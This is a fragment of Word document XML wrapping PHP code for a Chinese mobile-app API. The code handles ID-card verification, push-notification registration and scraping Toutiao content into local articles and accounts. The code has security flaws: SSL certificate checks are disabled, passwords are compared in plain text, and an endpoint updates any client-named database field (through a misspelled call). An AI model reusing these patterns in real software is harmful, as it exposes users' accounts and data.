          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DAE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194649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874B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57E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($this-&gt;member['sfz'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA436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2B95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正在审核中，无需重复提交</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0DFA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502,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F602E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E53E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0948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$add['xingming'] = $xingming;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7B7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$add['sfz'] = $sfz;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693505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$add['sfz_shou'] = $sfz_shou;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32259E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$add['sfz_zheng'] = $sfz_zheng;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685073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$add['hide'] = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71755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$add['time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D865C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($this-&gt;member['sfz']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C0F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Db::name('member_sfz')-&gt;where(['uid' =&gt; $this-&gt;memberId])-&gt;update($add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264829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395FC8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A88E4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提交成功，等待审核！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF1B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9FA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6D4698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485B26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提交失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE74C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236CF2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5977C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3F945F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A195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$add['uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79168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Db::name('member_sfz')-&gt;insert($add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CDA7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($db) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C970B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9AED2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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交成功，等待审核！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C517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33B2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05EEB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047EE6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提交失败，请联系管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135011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01BE2E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0DD4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93CD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4FDC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CFFD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info_sfz()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AEF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1FB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Db::name('member_sfz')-&gt;where('uid', $this-&gt;memberId)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD4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89A0E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1B1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getRegistrationId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7835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9FA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$jpush_id = input('jpush_id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C497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(!$jpush_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A298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77742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2D6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Db::name('member_jpush')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'jpush_id' =&gt; $jpush_id])-&gt;cache(true)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B55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($data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B64E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5DF6AE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9AE7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Db::name('member_jpush')-&gt;insert(['uid' =&gt; $this-&gt;memberId, 'jpush_id' =&gt; $jpush_id, 'time' =&gt; time()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B59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json([$a]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31096B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5DE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_user_add()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19772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7592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 input('mobile/d') ? input('mobile/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157879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input('password') ? input('password') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF16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$field = input('field') ? input('field') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895D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$value = input('value') ? input('value') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732C5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(!$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E205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26F044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手机号码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85F9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30C67C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9824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CE1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(!$password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88EB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1B0B1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密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FA9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'errcode' =&gt; 201,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D42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31A6A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640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(!$field) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6465F2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6137D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字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC89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6FE2FA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AF5D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B33E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(!$value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EEF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370795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字段值不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390246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201,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275780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E4E7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2A31F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD7E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-&gt;where([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9A8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'mobile' =&gt; $mobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE584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=&gt; $password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530653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C73B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-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4ED0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1C8FE6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579ADD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密码错误或用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1E21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211,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBA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04FF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9BAD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Db::nmae('member')-&gt;setField($field, $value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E53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($a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514BE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77D32B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=&gt; $a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3261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DDD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17EFAA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605989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操作失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F098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501,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A29A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A83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1E8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6E0B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6B60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0A4FD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148FF4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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AFCC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think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90F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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7990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1EB3B7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6F992C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JPush\Client as JPush;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62428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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B5F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Caiji extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CE1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11228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2BCD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get($url,$json=false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C84D5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$arrContextOptions=array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF57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"ssl"=&gt;array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB9F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"verify_peer"=&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF90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"verify_peer_name"=&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7490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DADD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366F39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$html=file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64088A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if($json){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C15F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$html=json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336AE5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FDE2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D40A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A829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qiniu($url,$type=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B7A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if(!$url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAAF4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126676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FD0AB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033D65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$type='.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C65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50C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require_once APP_PATH . '/../vendor/qiniu/autoload.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649B7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$db=db::name('member_config')-&gt;where(['type'=&gt;'sdkQiniu'])-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521A8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 = $db['0']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C93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 $db['1']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65985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$auth = new Auth($accessKey, $secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20597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$bmgr = new BucketManager($auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23248E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$bucket = $db['2']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7AC7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 = md5($url.rand(11111,999999)) .$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33D4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list($ret, $err) = $bmgr-&gt;fetch($url, $bucket, $key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878BA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($err !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A903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094491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269291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$key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE47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122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AB70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svideo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A033A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$category=input('category') ? input('category') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D674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$html=$this-&gt;get('toutiao/svideo/category/'.$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064762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$html=json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA8E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19463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暂无小视频</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FD6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6F04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03FE19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462F3B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if($v['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08ED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$title=Db::name("article")-&gt;where(['title'=&gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A955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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F35A7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5868CF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47E07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97771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463774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788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$data['title']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258E2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if(!$v['image']) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E88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if(!$v['video']) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C75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if(empty($v['user'])) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B40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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user']['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F2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46D871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$userInfo=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789201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$userData['toutiao_uid']=$userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145981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$userData['img']=$this-&gt;qiniu($userInfo['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1D2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$userData['nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CDD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1B1EB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B4E2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4FE9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$data['image']=$this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC1A8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$data['video']=$this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79308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$data['weitoutiao']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C4C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$data['mychannel']=4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0D4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053B62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$data['create_time']=$v['time'] ? $v['time'] : $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524784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$data['update_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB1F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$data['hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCBB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$data['des']=50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D0A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$data['typeid']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022837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$data['source']=$v['user']['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB41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$data['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057263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$id=Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051FA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'id:'.$id.$data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400F0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FF4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if(!empty($v['id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE820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$this-&gt;toutiao_ping($id,$v['id'],$v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327E5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9EEF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6441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33C9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user($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF39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$map['password']=md5(rand(100000,999999));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6FE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$map['hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CF6A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6A2FA9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$map['create_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182C2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$map['update_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50779F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$map['toutiao_uid']=$data['toutiao_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823E7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$map['nickname']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346306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$map['img']=$data['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BD1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$map['qianming']=$data['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81A2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$db=Db::name('member')-&gt;insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D93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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31185B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6E60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public function toutiao_search(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65E8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4FA74D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$page=$request-&gt;param('page') ? $request-&gt;param('page') : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60525E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$keyword=$request-&gt;param('keyword');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FE4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$typeid=$request-&gt;param('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7B3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if(!$keyword){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59674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请输入搜索关键词</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FFF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A5A5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if(!$typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1AB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请输入分类栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC21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9549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$tab=$request-&gt;param('tab') ? $request-&gt;param('tab') : 'search_tab';    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544041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$a['page']=$page;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FB3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$a['keyword']=$keyword;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35787C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$a['tab']=$tab;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F3F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$url="toutiao/search?".http_build_query($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A2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$html=$this-&gt;get($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1FE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$html=json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BD4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12F15F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50FA94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"&lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382152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if($v['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174D5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$titles=Db::name("article")-&gt;where(['title'=&gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2516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if($titles){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD612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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84C9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173E9B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EC2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8E03C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不存在标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F7C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690181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C478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if($v['user_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150B8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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B738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5FFB59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$userInfo=$this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A75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$userData['toutiao_uid']=$userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573146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$userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B0D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$userData['nickname']=$userInfo['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04B3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7567E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC49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E2AF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$data['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15766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9A17F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".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A5A7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451D43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EC1C7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if($v['mychannel']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10A0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if(!$v['content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E903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"content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11303D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02A3B9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5E1BB4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$data['image']            =           $this-&gt;qiniu($v['img']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFFA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$v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D2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if($v['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251984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($v['images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E83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$img[$k]['img']=$this-&gt;qiniu($v['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE006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$img[$k]['img_text']=$v['img_text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F561E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if($k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDE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            =          $img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76350C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2DA5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2E3F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$data['images']=json_encode($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3779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if($v['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3263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if(!$v['video_data'] || !$v['video_data']['video_url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F31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视频模式视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBBF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345E2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C195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$data['video']=$this-&gt;qiniu($v['video_data']['video_url'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9EDC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$data['image']=$this-&gt;qiniu($v['video_data']['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86DA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7A83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$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43053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$data['source']             =           $v['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED9E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$v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE311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$v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01117F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$data['update_time']        =           $v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763AD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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3F0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                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5947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          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E194A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$data['toutiao_tiemId']     =           $v['item_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4814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             =           $typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751FB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$id=Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2826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"[id:".$id.']'.$data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259A7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646ACA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F611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FDB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user_info($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D672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$url="toutiao/user_id?id=".$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76053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$html=$this-&gt;get($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42136F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$html=json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9CB1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C4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2452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catename($name,$typename=''){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F36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7E93FB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'news';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E358C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7680B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if($name=='news_others'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D88B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'news';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE34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218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$where['toutiao_name'] = $name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AE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$data=Db::name('typeid')-&gt;where($where)-&gt;whereOr('title',$name)-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3A0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680311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$time=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CEB8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$where['title']=$typename ? $typename : $name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D941C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$where['isdefault']=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628D6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$where['create_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE36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$where['update_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E7D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$where['hide']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E115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$where['des']=50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F769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$where['toutiao_name']=$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659BCA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$data=Db::name('typeid')-&gt;insertGetId($where);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA7D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66C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$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E157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EE0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toutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B51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5E9508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$url="toutiao/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167ECA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$html=$this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B50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 return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FBC6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210842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54E2A6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"&lt;br /&gt;\r\n";</w:t>
      </w:r>
